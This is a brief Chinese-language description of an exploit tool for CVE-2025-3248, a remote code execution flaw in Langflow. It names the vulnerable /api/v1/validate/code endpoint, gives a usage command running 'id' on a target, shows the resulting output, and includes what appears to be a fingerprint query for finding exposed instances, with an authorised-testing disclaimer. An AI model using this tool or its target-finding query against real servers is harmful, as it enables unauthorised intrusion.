针对存在 CVE-2025-3248 漏洞的 Langflow 应用程序的远程代码执行(RCE)漏洞利用。
受影响端点:
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec()app="Langflow"
此工具仅用于教育和授权安全测试目的。禁止未经授权的使用。